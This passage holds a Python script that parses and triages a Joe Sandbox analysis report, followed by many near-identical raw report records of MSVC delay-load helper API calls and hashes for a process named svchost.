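  • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• API String ID: 1269201914-0
"""

# Section headings as they appear in the report (assumed complete for this excerpt).
HEADINGS = {"APIs", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# One API bullet: optional "Part of subcall function XXXX:" prefix,
# then Name.MODULE, optional (args), optional comma, then "ref: ADDR".
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-F]+): )?"
    r"(?P<name>[\w@$?]+)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)$"
)

# Assumption of this example: DELAYIMP entries are the MSVC delay-load helper
# (delayimp.lib) linked into the binary, not logic the sample's author wrote.
RUNTIME_MODULES = {"DELAYIMP"}


def parse_records(text):
    """Split the report text into records; each has 'apis' (list of dicts) and 'fields'."""
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in HEADINGS:
            if line == "APIs":           # every record starts with its APIs block
                current = {"apis": [], "fields": {}}
                records.append(current)
            section = line
            continue
        if current is None:              # text before the first record
            continue
        body = line.lstrip("• ").strip()
        if section == "APIs":
            m = API_RE.match(body)
            if m:
                current["apis"].append(m.groupdict())
        else:                            # "Key: value" bullets of the other sections
            key, _, value = body.partition(":")
            current["fields"][key.strip()] = value.strip()
    return records


def direct_calls(record):
    """Names the function calls itself; 'Part of subcall' entries belong to callees."""
    return [a["name"] for a in record["apis"] if a["caller"] is None]


def is_runtime_boilerplate(record):
    """True when every direct call targets a runtime support module."""
    direct = [a for a in record["apis"] if a["caller"] is None]
    return bool(direct) and all(a["module"] in RUNTIME_MODULES for a in direct)


def triage(text):
    """Return (records per API String ID, records that still need a human look)."""
    records = parse_records(text)
    counts = Counter(r["fields"].get("API String ID", "") for r in records)
    interesting = [r for r in records if not is_runtime_boilerplate(r)]
    return counts, interesting


if __name__ == "__main__":
    counts, interesting = triage(SAMPLE_REPORT)
    for api_string_id, n in counts.most_common():
        print(f"{n} record(s) share API String ID {api_string_id}")
    for r in interesting:
        print("review:", r["fields"].get("API ID"), direct_calls(r))
```

Running the block lists the delay-load thunks as one group of shared API String ID and leaves two records for review: the GDI+ bitmap loader and the GetFileType caller. On the full report the same grouping collapses the many identical ___delayLoadHelper2@8 records into a single line.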
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E1E3
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 64bc2683e8c5c8179aba9915ea5683368df227b281208d157724f520a8cd5b0b
                                                            • Instruction ID: 0e6bfa7961fec88e8f6668fefaac0977c6f21e41d8f1d94eee83cce1e7b749fa
                                                            • Opcode Fuzzy Hash: 64bc2683e8c5c8179aba9915ea5683368df227b281208d157724f520a8cd5b0b
                                                            • Instruction Fuzzy Hash: 7AB012E129810CFC358471492C0BC37110CF0C4F11330413FF856C0180D8407D440532
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E1E3
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 5da71cd1a19f87872f853781e7d4486bb478fb7dffcb90c51ddf16c888370b57
                                                            • Instruction ID: 993c2bf1a5e7df0ab84df9a6ae037567e135f114b7d64607026710373a71c640
                                                            • Opcode Fuzzy Hash: 5da71cd1a19f87872f853781e7d4486bb478fb7dffcb90c51ddf16c888370b57
                                                            • Instruction Fuzzy Hash: 89B012E129800CEC354471492D0BC37510CF0C4F11330403EF856C0180DC407E050532
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E1E3
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: e920c69accc532be5e052f3c00113532dbec18c4ce2bb29cb9206c6009836423
                                                            • Instruction ID: 061bba75c47b00d0e9887069fd00bdb2d94812255ddb31408dec0e493b48e9d4
                                                            • Opcode Fuzzy Hash: e920c69accc532be5e052f3c00113532dbec18c4ce2bb29cb9206c6009836423
                                                            • Instruction Fuzzy Hash: 2BB012E129800CEC3544714A2C0BC37510CF0C4F11330403EF856C0190D8407D040532
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E1E3
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 95877f2a195a942bb0a3cec87711db6f6f3222b46ffeaf22ebbcc630ecc7db61
                                                            • Instruction ID: 28c4cbd232bf5d5a02f229441d70e47dc2c4dccbe6f9d5b059c74b5f68ec098b
                                                            • Opcode Fuzzy Hash: 95877f2a195a942bb0a3cec87711db6f6f3222b46ffeaf22ebbcc630ecc7db61
                                                            • Instruction Fuzzy Hash: 9CB012D529904CAC354471492C07C37110DF0C5B11330803EFC56C0180D840FC040532
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E1E3
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: e4fe435cf781c6d71d3566fbf3d63582b5175f1933c79f537d62044242914f37
                                                            • Instruction ID: ce7e4b9710cf446538e10510b8cacb0542617b6e07b70b1c4622d990bb7721e7
                                                            • Opcode Fuzzy Hash: e4fe435cf781c6d71d3566fbf3d63582b5175f1933c79f537d62044242914f37
                                                            • Instruction Fuzzy Hash: FAB012E129914CBC358472492C07C37110DF0C4B11330413FF856C0180D840BC480532
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E1E3
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 61751d09581269daf090101da4b3677df447107d3ad4b3ddc07be00c6bd3c52b
                                                            • Instruction ID: 0d2b86179a1c47fc9fd114d1514662c505466ce2f303c4aa2ba7cce822a9d1d1
                                                            • Opcode Fuzzy Hash: 61751d09581269daf090101da4b3677df447107d3ad4b3ddc07be00c6bd3c52b
                                                            • Instruction Fuzzy Hash: 9DB012D12A904CAC354471492C07C3B114DF4C4B11330403EF857C0190D840BC040532
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E1E3
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 711e54426703d085b1e53c097a79924eed272393ef6386f4bd195a68efc08ed1
                                                            • Instruction ID: fadd5ff0144e9fefa4d1adaff41836ac2ced6496982b6e95f66e943c17bb8180
                                                            • Opcode Fuzzy Hash: 711e54426703d085b1e53c097a79924eed272393ef6386f4bd195a68efc08ed1
                                                            • Instruction Fuzzy Hash: BEB012D529800CAC354471592C07C37114CF0C5B11330803EFD56C0180E940BC040532
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E3FC
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: dd5726563e5acdc93f5f30a3d2c440b8f9cedab9530b76c04340fe8c78aa038e
                                                            • Instruction ID: eabaacdc0b66e9829f2b3a1cde02f2ef3cc479d8ba88cd1f71bccb34a5470b40
                                                            • Opcode Fuzzy Hash: dd5726563e5acdc93f5f30a3d2c440b8f9cedab9530b76c04340fe8c78aa038e
                                                            • Instruction Fuzzy Hash: 0FB012F135C00C7D3504B1495E02C37420CF1C0B10330C03EF615C1280D8410C0D0533
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E3FC
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 4cb9cc84e0b979f3ab62334c14a2de6ef74c3fd189306ae52323c791ae866720
                                                            • Instruction ID: d4a72e46f78dc4aa9694aa0067808cb25cb6823503fac6daf1e91df0a1aa5833
                                                            • Opcode Fuzzy Hash: 4cb9cc84e0b979f3ab62334c14a2de6ef74c3fd189306ae52323c791ae866720
                                                            • Instruction Fuzzy Hash: 34B012F535800CBC3504F1485D06C37020CF1C0F10330803EF815C1280E8444E040533
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E3FC
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 20dfa13c8816e8f0c25adb31e1766db79d17e38de5e3fbf9010be5b821be01b9
                                                            • Instruction ID: b65b932d4edf4f2be9e89a00cabea7e2c8bfaf2686fca1a3eb176e03783adf71
                                                            • Opcode Fuzzy Hash: 20dfa13c8816e8f0c25adb31e1766db79d17e38de5e3fbf9010be5b821be01b9
                                                            • Instruction Fuzzy Hash: 1DB012F535800CBD3504F1495D02C37020CF1C0B10330C03EF915C1280D8404C080533
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E580
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: b4aa423eda4055f062eb0d5d52467a654f030d31c40afc99fdab480e84ce83f4
                                                            • Instruction ID: 1e6963271226b5d3cf53fc711a865613a53eac032d5a3688bdb22542eea99580
                                                            • Opcode Fuzzy Hash: b4aa423eda4055f062eb0d5d52467a654f030d31c40afc99fdab480e84ce83f4
                                                            • Instruction Fuzzy Hash: 83B012C125910C7D350472995C02C37010CF0C0B14332413EF415C5190F8400C040536
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E580
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 7ca18124448722c628e11ef005670d80fa0b24806957ea06bd6d175d814501df
                                                            • Instruction ID: 5167e65149194d44e9dadf22e4efe457eaa5b12c854cfde0a8dd6f3ffd489590
                                                            • Opcode Fuzzy Hash: 7ca18124448722c628e11ef005670d80fa0b24806957ea06bd6d175d814501df
                                                            • Instruction Fuzzy Hash: 79B012C125900C7C350472999D02C3B411CF0C0B14336433EF416C5180FC400D05053A
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E580
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: b4599278870a09305bb479892ded6f400ddbe7a931adeaae775f7abe882412a1
                                                            • Instruction ID: be8c4ce41640981ba0e6862eff7ddf6e40686937bcdfc5efc85fa8df5e658ca6
                                                            • Opcode Fuzzy Hash: b4599278870a09305bb479892ded6f400ddbe7a931adeaae775f7abe882412a1
                                                            • Instruction Fuzzy Hash: 42B012C125910C7C354472999C03C37011CF0C0B14336433FF416C5180F8400C440536
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E51F
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 537f7f3a8032d922747a29c5af25ddb373d9458b0ecdedbfd2584742113c0ce4
                                                            • Instruction ID: 61e7f6662e5df6c5bce3f1438ad3fe48c054f82a9deeb6858e5d45151740e7ea
                                                            • Opcode Fuzzy Hash: 537f7f3a8032d922747a29c5af25ddb373d9458b0ecdedbfd2584742113c0ce4
                                                            • Instruction Fuzzy Hash: 06B012C165840C7C390431695C06C3B410CF4C1F14331403EF462C0481A8400D080433
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E51F
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 367e501696b5eb2fb47fe4f1f3815ca800fffd1c4d6f58a049b9a4cdbb08ca46
                                                            • Instruction ID: e5b8a0ea27764a2303f92c63ae0081e1fc170e1dd312e8624306b514209262b7
                                                            • Opcode Fuzzy Hash: 367e501696b5eb2fb47fe4f1f3815ca800fffd1c4d6f58a049b9a4cdbb08ca46
                                                            • Instruction Fuzzy Hash: 23B012C165854C7C3904714D5D02C3B854CF4C1F14331803EF516C0180E8410C050533
                                                            APIs
